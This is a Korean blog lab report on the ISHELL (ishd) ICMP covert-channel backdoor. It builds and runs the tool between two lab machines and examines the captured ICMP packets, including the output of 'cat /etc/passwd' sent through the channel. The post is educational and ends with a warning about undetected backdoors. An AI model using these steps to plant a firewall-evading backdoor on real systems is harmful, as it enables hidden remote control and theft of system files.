2020. 7. 13.

[Network] ish 은닉채널 실습


    1. 구성과 계획
    • 네트워크 구성도
    서버 att6 - 192.168.10.149/00:0C:29:4F:41:6E
    클라이언트 att5 - 192.168.10.148/00:0C:29:C6:9A:42

    • 과정 정리
    step1. tcpdump 구동
    step2. ishd 설치 셋팅
    step3. ishd 구동 로그인
    step4. wireshark 캡쳐 확인

    1. 관련내용정리
    은닉채널 : 기본 채널에 기생하는 통신 채널
    ishd : icmp 메시지를 이용한 백도어 프로그램으로 은닉 채널 통신 프로그램, 세션이 없음으로 방화벽 우회가 가능
    icmp : TCP/IP에서 IP 패킷을 처리할 때 발생되는 문제를 알려주는 프로토콜

    1. 실습과정
    step1. tcpdump 구동
    tcpdump -xX -w hidechannel.cap

    step2. ishd 설치 셋팅
    서버와 클라이언트 양쪽 설치되어야 한다.
    tar xvfz ish-v0.2.tar.tar
    cd ISHELL-v0.2/
    make linux
    (gcc 잇어야 설치 가능하다)
    yum install -y gcc

    step3. ishd 구동 로그인
    • 서버
    /root/ISHELL-v0.2/ishd
    ps -ax |grep ishd
    Croot@localhost ISHELL-vø. ps -ax I grep ishd Warning: bad syntax, perhaps a bogus ' ? See /usr/share/doc/procps-3.2.8/FAQ 299ø ? 3ø2ø pts/ø ø:øø / root/ISHELL-vø.2/ishd e:øø grep ishd

    • 클라이언트
    /root/ISHELL-v0.2/ish 192.168.10.149

    step4. wireshark 캡쳐 확인
    wireshark on
    • 필터링 icmp
    26 3.326305 29 3.327713 101 7. 503389 102 7. 504159 103 7 . 504200 7 . 504230 105 7. 504260 121 8. 509818 122 8.510900 205 15 . 166572 206 15 . 166787 192.168.1B.148 192.168.1B.149 192. 168.10. 149 192. 168.10. 148 192. 168.10. 148 192. 168.10. 149 192. 168.10. 149 192. 168.10. 148 192. 168.10. 149 192. 168.10. 148 192. 168.10. 149 192. 168.10. 148 192. 168.10. 149 192. 168.10. 148 192. 168.10. 148 192. 168.10. 149 192. 168.10. 149 192. 168.10. 148 192. 168.10. 148 192. 168.10. 149 192. 168.10. 149 192. 168.10. 148 ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP 73 171 86 581 581 581 258 73 179 75 70 Echo Echo Echo Echo Echo Echo Echo Echo Echo Echo Echo (ping) (ping) (ping) (ping) (ping) (ping) (ping) (ping) (ping) (ping) reply reply reply reply reply reply reply reply reply reply reply id =ØxebØ5 , id =0xeb05 , id =0xeb05 , id =0xeb05 , id =0xeb05 , id =0xeb05 , id =0xeb05 , id =0xeb05 , id =0xeb05 , id =0xeb05 , id =0xeb05 , seq=Ø/Ø, tt1=64 seq=7936/31, seq=0/0, tt1 seq=8192/32, seq=8448/33, seq=8704/34, seq=8960/35, seq=0/0, tt1 seq=9216/36, seq=0/0, tt1 seq=9472/37, tt1=64 tt1=64 tt1=64 tt1=64 tt1=64 tt1=64 tt1=64

    cat /etc/passwd 응답 패킷 내용이다.
    87 85 42 88 48 81 94 29 67 72 74 75 6e 2d 73 38 28 75 65 63 29 67 78 78 75 63 69 73 74 6e 6e 38 48 +8 64 63 66 53 38 75 69 63 75 38 28 6e 6e 6e 31 69 28 72 63 66 65 38 29 64 72 6f 69 64 32 6f 6e 6e 33 38 74 66 65 74 28 74 29 69 64 72 29 28 6e 73 95 6f 28 63 65 72 38 45 64 74 6e 75 oups=û(r text=unc u : unconf nconfine Û:cÛ.c1Û d root root) gr oot) con onfined ined r:u d t:sÛ-s 23

    ls 명령어가 전송되는 패킷내용이다.
    00 oc 29 c6 9a 42 OØ øc oe 3b oe oe ae oe ae 01 øa 95 ØØ ØØ 9c 86 eb 05 øø øø øø øø øø øø 6c 73 29 5d 87 05 08 ØØ a4 48 ce a8 oa 94 ce a8 øø øø øø øø øø øø øø øø øe øe 02 oe Øa •Is

    1. 결론
    실습 다른 리눅스로 패킷을 캡쳐하였을땐 보이지 않았지만 서버에서 패킷을 캡처했을땐 보이는걸로 보아 다른 사람이 스니핑하기 어렵다고 판단했다. 그리고 이러한 불법 프로그램을 잘못 설치하게되면 관리자가 백도어 프로그램이 구동하는지 확인하기 어려우므로 함부로 아무거나 다운받으면 안된다.

시간:
라벨: ,

댓글 없음:

댓글 쓰기

피드 구독하기: 댓글 (Atom)